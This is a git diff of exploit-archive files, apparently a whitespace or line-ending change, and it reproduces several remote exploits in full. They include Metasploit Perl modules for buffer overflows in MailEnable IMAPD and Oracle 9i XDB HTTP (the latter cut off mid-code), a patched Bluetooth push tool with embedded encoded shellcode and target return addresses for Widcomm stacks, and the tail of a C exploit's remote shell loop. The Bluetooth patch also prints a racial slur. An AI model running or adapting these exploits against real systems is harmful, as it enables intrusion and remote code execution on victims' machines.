+                FD_SET (0, &rfds);
+                FD_SET (new_fd, &rfds);
+                FD_SET (new_fd, &wfds);
+
+                select (new_fd + 1, &rfds, NULL, NULL, NULL);
+
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                exit (EXIT_FAILURE);
+                        }
+                        sent=0;
+                        while (!sent) {
+                                select (new_fd+1, NULL, &wfds, NULL, NULL);
+                                if (FD_ISSET(new_fd, &wfds)) {
+                                        write(new_fd, buf, l);
+                                        sent=1;
+                                }
+                        }
+                }
+
+                if (FD_ISSET (new_fd, &rfds)) {
+                        l = read (new_fd, buf, sizeof (buf));
+                        if (l == 0) {
+                                fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+
+	return 0;
+}
+
+// milw0rm.com [2005-11-11]
diff --git a/platforms/windows/remote/1332.pm b/platforms/windows/remote/1332.pm
index 02e5e26c6..9e1301234 100755
--- a/platforms/windows/remote/1332.pm
+++ b/platforms/windows/remote/1332.pm
@@ -1,158 +1,158 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::mailenable_imap_w3c;
-use strict;
-use base 'Msf::Exploit';
-use Msf::Socket::Tcp;
-use Pex::Text;
-
-my $advanced = {
-  };
-
-my $info = {
-	'Name'    => 'MailEnable IMAPD W3C Logging Buffer Overflow',
-	'Version'  => '$Revision: 1.1 $',
-	'Authors' => [ 'y0 ', ],
-	'Arch'    => [ 'x86' ],
-	'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
-	'Priv'    => 1,
-	'AutoOpts'  =>
-	  {
-		'EXITFUNC'  => 'thread',
-	  },
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 143],
-		'USER'  => [1, 'DATA', 'IMAP Username'],
-		'PASS'  => [1, 'DATA', 'IMAP Password'],
-
-	  },
-	'Payload' =>
-	  {
-		'Prepend'   => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
-		'Space'     => 600,
-		'BadChars'  => "\x00\x0a\x0d\x20",
-		'Keys'      => ['+ws2ord'],
-	  },
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a buffer overflow in the W3C logging
-	functionality of the MailEnable IMAPD service. Logging is not
-	enabled by default and this exploit requires a valid username
-	and password to exploit the flaw. MailEnable Professional version
-	1.6 and prior and MailEnable Enterprise version 1.1 and prior are
-	affected.    
-}),
-	'Refs'  =>
-	  [
-		['BID', 15006],
-	  ],
-	'Targets' =>
-	  [
-		['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
-	  ],
-	'Keys' => ['imap'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-
-	return($self);
-}
-
-sub Check {
-	my ($self) = @_;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => 25,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return $self->CheckCode('Connect');
-	}
-
-	$s->Send("QUIT\r\n");
-	my $res = $s->Recv(-1, 20);
-	$s->Close();
-
-	if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
-		$self->PrintLine("[*] This server does not appear to be vulnerable.");
-		return $self->CheckCode('Safe');
-	}
-
-	$self->PrintLine("[*] Vulnerable installation detected :-)");
-	return $self->CheckCode('Detected');
-}
-
-sub Exploit {
-	my $self = shift;
-
-	my $targetHost  = $self->GetVar('RHOST');
-	my $targetPort  = $self->GetVar('RPORT');
-	my $targetIndex = $self->GetVar('TARGET');
-	my $user        = $self->GetVar('USER');
-	my $pass        = $self->GetVar('PASS');
-	my $encodedPayload = $self->GetVar('EncodedPayload');
-	my $shellcode   = $encodedPayload->Payload;
-	my $target = $self->Targets->[$targetIndex];
-
-	my $sock = Msf::Socket::Tcp->new(
-		'PeerAddr' => $targetHost,
-		'PeerPort' => $targetPort,
-	  );
-	if($sock->IsError) {
-		$self->PrintLine('Error creating socket: ' . $sock->GetError);
-		return;
-	}
-
-	my $resp = $sock->Recv(-1);
-	chomp($resp);
-	$self->PrintLine('[*] Got Banner: ' . $resp);
-
-	my $sploit = "a01 LOGIN $user $pass\r\n";
-	$sock->Send($sploit);
-	my $resp = $sock->Recv(-1);
-	if($sock->IsError) {
-		$self->PrintLine('Socket error: ' . $sock->GetError);
-		return;
-	}
-	if($resp !~ /^a01 BAD LOGIN-/) {
-		$self->PrintLine('Login error: ' . $resp);
-		return;
-	}
-	$self->PrintLine('[*] Logged in, sending overflow');
-
-	my $splat = Pex::Text::AlphaNumText(6196);
-	$sploit =
-	  "a01 SELECT ". $splat.
-	  "\xeb\x06".  pack('V', $target->[1]).
-	  $shellcode. "\r\n";
-
-	$sock->Send($sploit);
-
-	my $resp = $sock->Recv(-1);
-	if(length($resp)) {
-		$self->PrintLine('[*] Got response, bad: ' . $resp);
-	}
-
-	return;
-
-}
-
-1;
-
-# milw0rm.com [2005-11-20]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::mailenable_imap_w3c;
+use strict;
+use base 'Msf::Exploit';
+use Msf::Socket::Tcp;
+use Pex::Text;
+
+my $advanced = {
+  };
+
+my $info = {
+	'Name'    => 'MailEnable IMAPD W3C Logging Buffer Overflow',
+	'Version'  => '$Revision: 1.1 $',
+	'Authors' => [ 'y0 ', ],
+	'Arch'    => [ 'x86' ],
+	'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
+	'Priv'    => 1,
+	'AutoOpts'  =>
+	  {
+		'EXITFUNC'  => 'thread',
+	  },
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 143],
+		'USER'  => [1, 'DATA', 'IMAP Username'],
+		'PASS'  => [1, 'DATA', 'IMAP Password'],
+
+	  },
+	'Payload' =>
+	  {
+		'Prepend'   => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
+		'Space'     => 600,
+		'BadChars'  => "\x00\x0a\x0d\x20",
+		'Keys'      => ['+ws2ord'],
+	  },
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a buffer overflow in the W3C logging
+	functionality of the MailEnable IMAPD service. Logging is not
+	enabled by default and this exploit requires a valid username
+	and password to exploit the flaw. MailEnable Professional version
+	1.6 and prior and MailEnable Enterprise version 1.1 and prior are
+	affected.    
+}),
+	'Refs'  =>
+	  [
+		['BID', 15006],
+	  ],
+	'Targets' =>
+	  [
+		['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
+	  ],
+	'Keys' => ['imap'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+
+	return($self);
+}
+
+sub Check {
+	my ($self) = @_;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => 25,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return $self->CheckCode('Connect');
+	}
+
+	$s->Send("QUIT\r\n");
+	my $res = $s->Recv(-1, 20);
+	$s->Close();
+
+	if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
+		$self->PrintLine("[*] This server does not appear to be vulnerable.");
+		return $self->CheckCode('Safe');
+	}
+
+	$self->PrintLine("[*] Vulnerable installation detected :-)");
+	return $self->CheckCode('Detected');
+}
+
+sub Exploit {
+	my $self = shift;
+
+	my $targetHost  = $self->GetVar('RHOST');
+	my $targetPort  = $self->GetVar('RPORT');
+	my $targetIndex = $self->GetVar('TARGET');
+	my $user        = $self->GetVar('USER');
+	my $pass        = $self->GetVar('PASS');
+	my $encodedPayload = $self->GetVar('EncodedPayload');
+	my $shellcode   = $encodedPayload->Payload;
+	my $target = $self->Targets->[$targetIndex];
+
+	my $sock = Msf::Socket::Tcp->new(
+		'PeerAddr' => $targetHost,
+		'PeerPort' => $targetPort,
+	  );
+	if($sock->IsError) {
+		$self->PrintLine('Error creating socket: ' . $sock->GetError);
+		return;
+	}
+
+	my $resp = $sock->Recv(-1);
+	chomp($resp);
+	$self->PrintLine('[*] Got Banner: ' . $resp);
+
+	my $sploit = "a01 LOGIN $user $pass\r\n";
+	$sock->Send($sploit);
+	my $resp = $sock->Recv(-1);
+	if($sock->IsError) {
+		$self->PrintLine('Socket error: ' . $sock->GetError);
+		return;
+	}
+	if($resp !~ /^a01 BAD LOGIN-/) {
+		$self->PrintLine('Login error: ' . $resp);
+		return;
+	}
+	$self->PrintLine('[*] Logged in, sending overflow');
+
+	my $splat = Pex::Text::AlphaNumText(6196);
+	$sploit =
+	  "a01 SELECT ". $splat.
+	  "\xeb\x06".  pack('V', $target->[1]).
+	  $shellcode. "\r\n";
+
+	$sock->Send($sploit);
+
+	my $resp = $sock->Recv(-1);
+	if(length($resp)) {
+		$self->PrintLine('[*] Got response, bad: ' . $resp);
+	}
+
+	return;
+
+}
+
+1;
+
+# milw0rm.com [2005-11-20]
diff --git a/platforms/windows/remote/135.c b/platforms/windows/remote/135.c
index d6a527e18..ea95f8e67 100755
--- a/platforms/windows/remote/135.c
+++ b/platforms/windows/remote/135.c
@@ -216,6 +216,6 @@ int main(int argc,char *argv[])
 		}
 	return 0;
 }
-
-
-// milw0rm.com [2003-12-16]
+
+
+// milw0rm.com [2003-12-16]
diff --git a/platforms/windows/remote/1357.diff b/platforms/windows/remote/1357.diff
index ba8f5d984..242a0ec57 100755
--- a/platforms/windows/remote/1357.diff
+++ b/platforms/windows/remote/1357.diff
@@ -1,171 +1,171 @@
---- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
-+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
-@@ -1,4 +1,10 @@
- /*
-+   http://www.digitalmunition.com
-+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
-+   http://www.pentest.co.uk/documents/ptl-2004-03.html
-+
-+*/
-+/*
-  * UNrooted.net example code
-  *
-  * Most of these functions are just rips from the Affix Bluetooth project OBEX
-@@ -62,7 +68,10 @@
- 
- #include "obex_socket.h"
- 
--#define UPUSH_APPNAME "ussp-push v0.4"
-+#include 
-+#include 
-+
-+#define UPUSH_APPNAME "BluePIMped v0.1"
- #define BT_SERVICE "OBEX"
- #define OBEX_PUSH        5
- 
-@@ -316,6 +325,9 @@
- 	switch (event)  {
-         case OBEX_EV_PROGRESS:
- 		printf("Made some progress...\n");
-+		sleep(3);
-+		printf("Peace nigga...\n");
-+		exit(0);
- 		break;
- 
-         case OBEX_EV_ABORT:
-@@ -382,9 +394,7 @@
- 	name = remote;
- 
- 	name_len = (strlen(name)+1)<<1;
--	if( (namebuf = g_malloc(name_len)) )    {
--		OBEX_CharToUnicode(namebuf, name, name_len);
--	}
-+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
- 
- 	buf = easy_readfile(path, &file_size);
- 	if(buf == NULL) {
-@@ -424,6 +434,24 @@
- 	return err;
- }
- 
-+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
-+{
-+         int s = hci_open_dev(hdev);
-+
-+         if (s < 0) {
-+                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
-+                                                 hdev, strerror(errno), errno);
-+                 exit(1);
-+         }
-+         if (opt) {
-+                 if (hci_write_local_name(s, opt, 2000) < 0) {
-+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
-+                                                 hdev, strerror(errno), errno);
-+                         exit(1);
-+                 }
-+	}
-+
-+}
- 
- /*
-  * That's all there is to it.  With it all setup like this all I have to do
-@@ -434,19 +462,87 @@
- 
- int main( int argc, char **argv )
- {
--	if ( argc != 4 ) {
--		printf("%s\n\n"
--		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
--		       "\tDEVICE        = RFCOMM TTY device file\n"
--		       "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
--		       "\tLFILE         = Local file path\n"
--		       "\tRFILE         = Remote file name\n\n",
--		       UPUSH_APPNAME, argv[0]);
-+/* 
-+	The following may be necessary in hcid.conf to prevent the pairing prompts.
-+
-+       # Authentication and Encryption (Security Mode 3)
-+        auth disable;
-+        encrypt disable;
-+*/
-+
-+	struct
-+	{
-+  		char *os;
-+  		u_long ret;
-+	}
-+ 	targets[] =
-+ 	{
-+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
-+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
-+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
-+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
-+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
-+  		{ "[ Crash ]", 0x41424344 },
-+	}, v;
-+
-+	if ( argc != 3 ) {
-+		printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET 	= Target number\n",UPUSH_APPNAME,argv[0]);
-+		printf("Types:\n");
-+		int i;
-+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
-+  		printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
-+
- 		return( -1 );
- 	}
- 
--	printf( "pushing file %s\n", argv[2] );
--	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
-+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
-+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
-+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
-+	/* this still crashes the BTStackServer.exe... but oh well */
-+	unsigned char scode[] = 
-+	"\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
-+	"\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
-+	"\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
-+	"\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
-+	"\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
-+	"\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
-+	"\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
-+	"\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
-+	"\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
-+	"\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
-+	"\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
-+	"\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
-+	"\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
-+	"\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
-+	
-+	set_device_name(0,0,scode);
-+	//printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
-+	//printf( "pushing file.\n");
-+
-+	char buf[3000];
-+	memset(buf,'\0',sizeof(buf));
-+	memset(buf,'Z',3); // Sometimes u need 3 z's 
-+
-+        int type = atoi(argv[2]);
-+        if(type)
-+        {
-+        	printf("[-] Selected target:\n");
-+              	printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);              
-+        }
-+
-+	int x;
-+	for(x=0; x<=122; x=x+1)
-+	{
-+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
-+	}
-+	// Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode
-+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
-+		printf( "error\n" );
-+		return( -1 );
-+	}
-+	printf("\nsleeping 3 seconds before triggering the shellcode\n"); 
-+	sleep(3);
-+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
- 		printf( "error\n" );
- 		return( -1 );
- 	}
-
-// milw0rm.com [2005-12-04]
+--- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
++++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
+@@ -1,4 +1,10 @@
+ /*
++   http://www.digitalmunition.com
++   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
++   http://www.pentest.co.uk/documents/ptl-2004-03.html
++
++*/
++/*
+  * UNrooted.net example code
+  *
+  * Most of these functions are just rips from the Affix Bluetooth project OBEX
+@@ -62,7 +68,10 @@
+ 
+ #include "obex_socket.h"
+ 
+-#define UPUSH_APPNAME "ussp-push v0.4"
++#include 
++#include 
++
++#define UPUSH_APPNAME "BluePIMped v0.1"
+ #define BT_SERVICE "OBEX"
+ #define OBEX_PUSH        5
+ 
+@@ -316,6 +325,9 @@
+ 	switch (event)  {
+         case OBEX_EV_PROGRESS:
+ 		printf("Made some progress...\n");
++		sleep(3);
++		printf("Peace nigga...\n");
++		exit(0);
+ 		break;
+ 
+         case OBEX_EV_ABORT:
+@@ -382,9 +394,7 @@
+ 	name = remote;
+ 
+ 	name_len = (strlen(name)+1)<<1;
+-	if( (namebuf = g_malloc(name_len)) )    {
+-		OBEX_CharToUnicode(namebuf, name, name_len);
+-	}
++	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
+ 
+ 	buf = easy_readfile(path, &file_size);
+ 	if(buf == NULL) {
+@@ -424,6 +434,24 @@
+ 	return err;
+ }
+ 
++static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
++{
++         int s = hci_open_dev(hdev);
++
++         if (s < 0) {
++                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
++                                                 hdev, strerror(errno), errno);
++                 exit(1);
++         }
++         if (opt) {
++                 if (hci_write_local_name(s, opt, 2000) < 0) {
++                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
++                                                 hdev, strerror(errno), errno);
++                         exit(1);
++                 }
++	}
++
++}
+ 
+ /*
+  * That's all there is to it.  With it all setup like this all I have to do
+@@ -434,19 +462,87 @@
+ 
+ int main( int argc, char **argv )
+ {
+-	if ( argc != 4 ) {
+-		printf("%s\n\n"
+-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
+-		       "\tDEVICE        = RFCOMM TTY device file\n"
+-		       "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
+-		       "\tLFILE         = Local file path\n"
+-		       "\tRFILE         = Remote file name\n\n",
+-		       UPUSH_APPNAME, argv[0]);
++/* 
++	The following may be necessary in hcid.conf to prevent the pairing prompts.
++
++       # Authentication and Encryption (Security Mode 3)
++        auth disable;
++        encrypt disable;
++*/
++
++	struct
++	{
++  		char *os;
++  		u_long ret;
++	}
++ 	targets[] =
++ 	{
++  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
++  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
++  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
++  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
++  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
++  		{ "[ Crash ]", 0x41424344 },
++	}, v;
++
++	if ( argc != 3 ) {
++		printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET 	= Target number\n",UPUSH_APPNAME,argv[0]);
++		printf("Types:\n");
++		int i;
++  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
++  		printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
++
+ 		return( -1 );
+ 	}
+ 
+-	printf( "pushing file %s\n", argv[2] );
+-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
++	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
++	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
++	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
++	/* this still crashes the BTStackServer.exe... but oh well */
++	unsigned char scode[] = 
++	"\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
++	"\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
++	"\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
++	"\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
++	"\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
++	"\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
++	"\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
++	"\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
++	"\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
++	"\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
++	"\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
++	"\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
++	"\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
++	"\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
++	
++	set_device_name(0,0,scode);
++	//printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
++	//printf( "pushing file.\n");
++
++	char buf[3000];
++	memset(buf,'\0',sizeof(buf));
++	memset(buf,'Z',3); // Sometimes u need 3 z's 
++
++        int type = atoi(argv[2]);
++        if(type)
++        {
++        	printf("[-] Selected target:\n");
++              	printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);              
++        }
++
++	int x;
++	for(x=0; x<=122; x=x+1)
++	{
++    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
++	}
++	// Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode
++	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
++		printf( "error\n" );
++		return( -1 );
++	}
++	printf("\nsleeping 3 seconds before triggering the shellcode\n"); 
++	sleep(3);
++	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
+ 		printf( "error\n" );
+ 		return( -1 );
+ 	}
+
+// milw0rm.com [2005-12-04]
diff --git a/platforms/windows/remote/136.pl b/platforms/windows/remote/136.pl
index b5e0d366a..2dd61b10d 100755
--- a/platforms/windows/remote/136.pl
+++ b/platforms/windows/remote/136.pl
@@ -84,6 +84,6 @@ $request	= "GET /SwEzModule.dll?operation=login&autologin=".
 	print "Done\r\n";
 exit;
 
-
-
-# milw0rm.com [2003-12-18]
+
+
+# milw0rm.com [2003-12-18]
diff --git a/platforms/windows/remote/1365.pm b/platforms/windows/remote/1365.pm
index e03399a54..3102c6df2 100755
--- a/platforms/windows/remote/1365.pm
+++ b/platforms/windows/remote/1365.pm
@@ -1,164 +1,163 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::oracle9i_xdb_http;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-
-	'Name'  => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
-	'Version'  => '$Revision: 1.1 $',
-	'Authors' => [ 'y0 [at] w00t-shell.net', ],
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
-	'Priv'  => 0,
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 8080],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-	  
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	'Payload' =>
-	  {
-		'Space'     => 450,
-		'BadChars'  => "\x00",
-		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
-		'Keys'      => ['+ws2ord'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a stack overflow in the authorization
-		code of the Oracle 9i HTTP XDB service. David Litchfield, 
-        has illustrated multiple vulnerabilities in the Oracle
-        9i XML Database (XDB), during a seminar on "Variations
-        in exploit methods between Linux and Windows" presented
-        at the Blackhat conference. 
-}),
-
-	'Refs'  =>   [
-		['BID', '8375'],
-		['CVE', '2003-0727'],
-		['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
-	  ],
-
-	'DefaultTarget' => 0,
-	'Targets' => [
-
-		['Oracle 9.2.0.1 Universal', 0x60616d46],
-
-	  ],
-
-	'Keys' => ['oracle'],
-
-	'DisclosureDate' => 'Aug 18 2003',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Check {
-	my ($self) = @_;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return $self->CheckCode('Connect');
-	}
-
-	$s->Send("GET / HTTP/1.0\r\n\r\n");
-	my $res = $s->Recv(-1, 20);
-	$s->Close();
-
-	if ($res !~ /9\.2\.0\.1\.0/) {
-		$self->PrintLine("[*] This server does not appear to be vulnerable.");
-		return $self->CheckCode('Safe');
-	}
-
-	$self->PrintLine("[*] Vulnerable installation detected :-)");
-	return $self->CheckCode('Detected');
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $offset      = $self->GetVar('OFFSET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target = $self->Targets->[$target_idx];
-
-	if (! $self->InitNops(128)) {
-		$self->PrintLine("[*] Failed to initialize the nop module.");
-		return;
-	}
-
-	my $splat =
-	  "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
-	  pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
-	  $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;
-
-	my $sploit =
